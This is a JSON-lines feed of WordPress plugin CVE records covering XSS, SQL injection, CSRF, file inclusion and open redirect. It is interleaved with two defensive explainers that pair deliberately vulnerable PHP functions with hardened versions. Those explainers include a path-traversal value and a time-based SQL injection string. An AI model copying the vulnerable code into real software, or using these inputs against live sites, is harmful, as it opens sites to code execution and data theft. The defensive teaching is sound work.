{"CVE_ID":"CVE-2024-4273","slug":"essential-real-estate","versionImpact":"4.4.2","description":"The Essential Real Estate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ere_property_map' shortcode in all versions up to, and including, 4.4.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c62ec31a-55e9-4404-b860-fa9a51ba3d3f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c62ec31a-55e9-4404-b860-fa9a51ba3d3f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/essential-real-estate\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/essential-real-estate\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3602","slug":"promolayer-popup-builder","versionImpact":"1.1.0","description":"The Pop ups, Exit intent popups, email popups, banners, bars, countdowns and cart savers \u2013 Promolayer plugin for WordPress is vulnerable to unauthorized plugin settings update due to a missing capability check on the disconnect_promolayer function in all versions up to, and including, 1.1.0. This makes it possible for authenticated attackers, with subscriber access or higher, to remove the Promolayer connection.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05b051bc-3b1c-412e-b3d0-98ff2c8bc06e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05b051bc-3b1c-412e-b3d0-98ff2c8bc06e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/promolayer-popup-builder\\\/trunk\\\/admin\\\/class-promolayer-admin.php#L208\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/promolayer-popup-builder\\\/trunk\\\/admin\\\/class-promolayer-admin.php#L208\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11723","slug":"kvcore-idx","versionImpact":"2.3.35","description":"The kvCORE IDX plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via any parameter on pages with the kvcoreidx_listings_sitemap_ranges, kvcoreidx_listings_sitemap_page, kvcoreidx_agent_profile_sitemap, or kvcoreidx_agent_profile shortcode present in all versions up to, and including, 2.3.35 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kvcore-idx\\\/includes\\\/kvcore\\\/class-actions.php#L1170\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kvcore-idx\\\/includes\\\/kvcore\\\/class-actions.php#L1170\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/074d8ccc-4fd6-4d46-9bc2-98d209f5a6a1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/074d8ccc-4fd6-4d46-9bc2-98d209f5a6a1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11642","slug":"ajax-filter-posts","versionImpact":"3.4.12","description":"The Post Grid Master \u2013 Custom Post Types, Taxonomies & Ajax Filter Everything with Infinite Scroll, Load More, Pagination & Shortcode Builder plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.4.12 via the 'locate_template' function. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included. The file included must have a .php extension.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ajax-filter-posts\\\/tags\\\/3.4.12\\\/inc\\\/Shortcode.php#L624\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ajax-filter-posts\\\/tags\\\/3.4.12\\\/inc\\\/Shortcode.php#L624\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b299a932-8167-4547-845b-637c4971360d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b299a932-8167-4547-845b-637c4971360d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
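The CVE-2024-11642 record above is a local file inclusion through `locate_template`: that core function only joins the theme directory to the name it is given and checks that the file exists, so a request-controlled name with `../` segments walks out of the theme and `load_template()` then executes whatever it finds, subject to the `.php` extension the record notes. The block below is an added illustration, not code from Post Grid Master or any plugin in this feed; the shortcode, layout and template names are hypothetical. It shows the vulnerable shape beside a hardened resolver that maps the request value onto a fixed set of known templates and verifies the resolved path before including it.

```php
<?php
// Added illustration (hypothetical names); not code from any plugin in this feed.

// --- Vulnerable shape: a request value becomes the template path. ---
// layout=../../../uploads/2024/11/avatar.php resolves to a file the attacker
// uploaded, and load_template() include()s it.
function example_render_grid_vulnerable() {
    $layout = $_GET['layout'];
    load_template( locate_template( 'grid/' . $layout . '.php' ) );
}

// --- Hardened shape: the request selects a key, never a path. ---
function example_grid_layouts() {
    return array(
        'list'    => 'grid/list.php',
        'masonry' => 'grid/masonry.php',
        'cards'   => 'grid/cards.php',
    );
}

function example_resolve_grid_template( $layout ) {
    $layouts = example_grid_layouts();
    $key     = sanitize_key( (string) $layout ); // lowercase [a-z0-9_-] only
    if ( ! isset( $layouts[ $key ] ) ) {
        $key = 'list';                           // unknown value: default, never the raw input
    }
    $rel = $layouts[ $key ];

    // Theme override first (child theme, then parent), then the plugin's own copy.
    $path = locate_template( $rel );
    if ( '' === $path ) {
        $path = plugin_dir_path( __FILE__ ) . 'templates/' . $rel;
    }

    // Defence in depth: the resolved file must live under the theme or plugin directory,
    // so a symlink or a misconfigured theme path cannot widen the search.
    $real    = realpath( $path );
    $allowed = array(
        realpath( get_stylesheet_directory() ),
        realpath( get_template_directory() ),
        realpath( plugin_dir_path( __FILE__ ) ),
    );
    foreach ( $allowed as $dir ) {
        if ( $dir && $real && 0 === strpos( $real, $dir . DIRECTORY_SEPARATOR ) ) {
            return $real;
        }
    }
    return false;
}

function example_render_grid_hardened( $atts ) {
    $atts     = shortcode_atts( array( 'layout' => 'list' ), $atts, 'example_grid' );
    $template = example_resolve_grid_template( $atts['layout'] );
    if ( ! $template ) {
        return '';
    }
    ob_start();
    load_template( $template, false ); // require, not require_once: shortcode may repeat
    return ob_get_clean();
}
add_shortcode( 'example_grid', 'example_render_grid_hardened' );
```

The allowlist is the fix; the `realpath()` prefix check only guards against the resolver being fed a path from somewhere other than the allowlist in a later refactor. Note the record's "must have a .php extension" caveat cuts both ways: it rules out including raw image uploads, but a `.php` file dropped through any other upload weakness is enough.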
{"CVE_ID":"CVE-2024-13399","slug":"gosign-posts-slider-block","versionImpact":"1.1.0","description":"The Gosign \u2013 Posts Slider Block plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'posts-slider-block' block in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gosign-posts-slider-block\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gosign-posts-slider-block\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0778c676-92e6-4813-a564-06463fc84eec?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0778c676-92e6-4813-a564-06463fc84eec?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1005","slug":"elementskit-lite","versionImpact":"3.4.0","description":"The ElementsKit Elementor addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Image Accordion widget in all versions up to, and including, 3.4.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementskit-lite\\\/trunk\\\/modules\\\/layout-manager\\\/assets\\\/js\\\/ekit-layout-library.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementskit-lite\\\/trunk\\\/modules\\\/layout-manager\\\/assets\\\/js\\\/ekit-layout-library.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Felementskit-lite&old=3230214&new_path=%2Felementskit-lite&new=3237243&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Felementskit-lite&old=3230214&new_path=%2Felementskit-lite&new=3237243&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/elementskit-lite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/elementskit-lite\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b74d6aa-ad59-42be-b454-9c27428cab01?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b74d6aa-ad59-42be-b454-9c27428cab01?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1319","slug":"site-mailer","versionImpact":"1.2.3","description":"The Site Mailer \u2013 SMTP Replacement, Email API Deliverability & Email Log plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 1.2.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3247059\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3247059\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/site-mailer\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/site-mailer\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9fe3574-f338-474c-af78-f843501d422c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9fe3574-f338-474c-af78-f843501d422c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-31640","slug":"magic-carousel","versionImpact":"1.4","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in LambertGroup Magic Responsive Slider and Carousel WordPress allows SQL Injection. This issue affects Magic Responsive Slider and Carousel WordPress: from n\/a through 1.4.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/magic-carousel\\\/vulnerability\\\/wordpress-magic-responsive-slider-and-carousel-wordpress-1-4-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/magic-carousel\\\/vulnerability\\\/wordpress-magic-responsive-slider-and-carousel-wordpress-1-4-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5490","slug":"football-pool","versionImpact":"2.12.4","description":"The Football Pool plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.12.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/football-pool\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/football-pool\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/16a285b1-7a20-455f-8f74-2e468dd436d3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/16a285b1-7a20-455f-8f74-2e468dd436d3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6261","slug":"fleetwire-fleet-management","versionImpact":"1.0.19","description":"The Fleetwire Fleet Management plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's fleetwire_list shortcode in all versions up to, and including, 1.0.19 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fleetwire-fleet-management\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fleetwire-fleet-management\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7593b8b5-36c0-4c68-b1f2-d505fafc3328?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7593b8b5-36c0-4c68-b1f2-d505fafc3328?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0073","slug":"wp-client-logo-carousel","versionImpact":"3.0.0","description":"The Client Logo Carousel WordPress plugin through 3.0.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e5599968-a435-405a-8829-9840a2144987\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e5599968-a435-405a-8829-9840a2144987\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-46861","slug":"login-page-styler","versionImpact":"6.2","description":"Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Zia Imtiaz Custom Login Page Styler for WordPress plugin <=\u00a06.2 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/login-page-styler\\\/wordpress-login-page-styler-plugin-6-2-cross-site-scripting-xss?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/login-page-styler\\\/wordpress-login-page-styler-plugin-6-2-cross-site-scripting-xss?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2599","slug":"ldap-login-for-intranet-sites","versionImpact":"4.1.4","description":"The Active Directory Integration plugin for WordPress is vulnerable to Cross-Site Request Forgery leading to time-based SQL Injection via the orderby and order parameters in versions up to, and including, 4.1.4 due to missing nonce verification on the get_users function and insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to cause resource exhaustion via a forged request granted they can trick an administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/74089b16-76fa-4654-9007-3f0c2e894894?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/74089b16-76fa-4654-9007-3f0c2e894894?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ldap-login-for-intranet-sites\\\/trunk\\\/class-mo-ldap-user-auth-reports.php?rev=2859403#L64\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ldap-login-for-intranet-sites\\\/trunk\\\/class-mo-ldap-user-auth-reports.php?rev=2859403#L64\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2910898%40ldap-login-for-intranet-sites%2Ftrunk&old=2903294%40ldap-login-for-intranet-sites%2Ftrunk&sfp_email=&sfph_mail=#file5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2910898%40ldap-login-for-intranet-sites%2Ftrunk&old=2903294%40ldap-login-for-intranet-sites%2Ftrunk&sfp_email=&sfph_mail=#file5\",\"refsource\":\"MISC\",\"tags\":[]}]"}
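The CVE-2023-2599 record above (CSRF chained to time-based SQL injection through `orderby` and `order`), together with the CVE-2025-31640 SQL injection entry earlier in this feed, is the ORDER BY case that trips up plugins which otherwise use `$wpdb->prepare()`: placeholders quote values, and an identifier quoted as a string (`ORDER BY 'username'`) sorts by a constant, so the column and direction end up concatenated. The block below is an added illustration, not code from the Active Directory Integration plugin or any plugin in this feed; the table, column and function names are hypothetical. It shows the vulnerable shape beside a hardened query that allowlists identifiers, parameterises values, and sits behind the nonce and capability checks the record's CSRF half requires.

```php
<?php
// Added illustration (hypothetical names); not code from any plugin in this feed.

// --- Vulnerable shape: sort column and direction concatenated into the query. ---
// ?orderby=username,(SELECT SLEEP(5))&order=ASC turns the report into a timing oracle;
// chained with a missing nonce, an administrator's visit to a crafted page fires it.
function example_get_users_vulnerable() {
    global $wpdb;
    $orderby = $_GET['orderby'];
    $order   = $_GET['order'];
    return $wpdb->get_results(
        "SELECT * FROM {$wpdb->prefix}example_auth_log ORDER BY $orderby $order"
    );
}

// --- Hardened shape: identifiers from an allowlist, values through prepare(). ---
function example_get_users_hardened( $args ) {
    global $wpdb;

    $columns = array( 'id', 'username', 'email', 'last_login' );
    $orderby = isset( $args['orderby'] ) && in_array( $args['orderby'], $columns, true )
        ? $args['orderby'] : 'last_login';
    $order   = isset( $args['order'] ) && 'ASC' === strtoupper( (string) $args['order'] )
        ? 'ASC' : 'DESC';
    $limit   = isset( $args['limit'] ) ? max( 1, min( 100, absint( $args['limit'] ) ) ) : 25;
    $status  = isset( $args['status'] ) ? (string) $args['status'] : 'success';

    // $orderby and $order can only be one of the literals above, so interpolating
    // them is safe; $status and $limit are values and go through placeholders.
    // (WordPress 6.2 added the %i placeholder for identifiers as an alternative.)
    $sql = $wpdb->prepare(
        "SELECT id, username, email, last_login
           FROM {$wpdb->prefix}example_auth_log
          WHERE status = %s
          ORDER BY $orderby $order
          LIMIT %d",
        $status,
        $limit
    );
    return $wpdb->get_results( $sql );
}

// The admin-side report: nonce first (the CSRF half of the record), capability
// second, then the hardened query, then escaped output.
function example_render_auth_report() {
    check_admin_referer( 'example_auth_report' );
    if ( ! current_user_can( 'list_users' ) ) {
        wp_die( esc_html__( 'Not allowed.', 'example' ), 403 );
    }
    $rows = example_get_users_hardened( wp_unslash( $_GET ) );
    echo '<table class="widefat">';
    foreach ( $rows as $row ) {
        printf(
            '<tr><td>%s</td><td>%s</td><td>%s</td></tr>',
            esc_html( $row->username ),
            esc_html( $row->email ),
            esc_html( $row->last_login )
        );
    }
    echo '</table>';
}
```

When reviewing a plugin for this class, grep for `ORDER BY`, `GROUP BY` and table or column names built from `$_GET`/`$_POST`/`$_REQUEST`: those are the places `prepare()` cannot help on its own, and a missing allowlist there is the finding, regardless of how carefully the WHERE clause is parameterised.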
{"CVE_ID":"CVE-2021-4409","slug":"exportfeed-for-woocommerce-product-to-etsy","versionImpact":"3.3.1","description":"The WooCommerce Etsy Integration plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.3.1. This is due to missing or incorrect nonce validation on the etcpf_delete_feed() function. This makes it possible for unauthenticated attackers to delete an export feed via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2573194\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2573194\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/99489cc0-2e73-4d55-b95f-46d574897fac?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/99489cc0-2e73-4d55-b95f-46d574897fac?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4963","slug":"ws-facebook-likebox","versionImpact":"5.0","description":"The WS Facebook Like Box Widget for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'ws-facebook-likebox' shortcode in versions up to, and including, 5.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8bebc229-9d15-439f-a8df-f68455bc5193?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8bebc229-9d15-439f-a8df-f68455bc5193?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ws-facebook-likebox\\\/trunk\\\/includes\\\/shortcodes.php#L22\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ws-facebook-likebox\\\/trunk\\\/includes\\\/shortcodes.php#L22\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-36508","slug":"contact-form-to-db","versionImpact":"1.7.1","description":"The Contact Form to DB by BestWebSoft plugin for WordPress is vulnerable to SQL Injection via the 's' parameter in versions up to, and including, 1.7.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/contact-form-to-db\\\/wordpress-contact-form-to-db-by-bestwebsoft-plugin-1-7-1-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/contact-form-to-db\\\/wordpress-contact-form-to-db-by-bestwebsoft-plugin-1-7-1-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3517","slug":"auxin-elements","versionImpact":"2.15.5","description":"The Shortcodes and extra features for Phlox theme plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Accordion Widget in all versions up to, and including, 2.15.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4541890-4c0d-4348-91df-42cf4b575514?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4541890-4c0d-4348-91df-42cf4b575514?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-elements\\\/tags\\\/2.15.5\\\/includes\\\/elementor\\\/widgets\\\/accordion.php#L745\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-elements\\\/tags\\\/2.15.5\\\/includes\\\/elementor\\\/widgets\\\/accordion.php#L745\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3597","slug":"export-wp-page-to-static-html","versionImpact":"2.2.2","description":"The Export WP Page to Static HTML\/CSS plugin for WordPress is vulnerable to Open Redirect in all versions up to, and including, 2.2.2. This is due to insufficient validation on the redirect url supplied via the rc_exported_zip_file parameter. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/598e2c2e-7dd5-435e-a366-6c7569243f2a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/598e2c2e-7dd5-435e-a366-6c7569243f2a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/export-wp-page-to-static-html\\\/trunk\\\/admin\\\/class-export-wp-page-to-static-html-admin.php#L1289\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/export-wp-page-to-static-html\\\/trunk\\\/admin\\\/class-export-wp-page-to-static-html-admin.php#L1289\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6722","slug":"chatbot-support-ai","versionImpact":"1.0.2","description":"The Chatbot Support AI: Free ChatGPT Chatbot, Woocommerce Chatbot WordPress plugin through 1.0.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ce909d3c-2ef2-4167-87c4-75b5effb2a4d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ce909d3c-2ef2-4167-87c4-75b5effb2a4d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
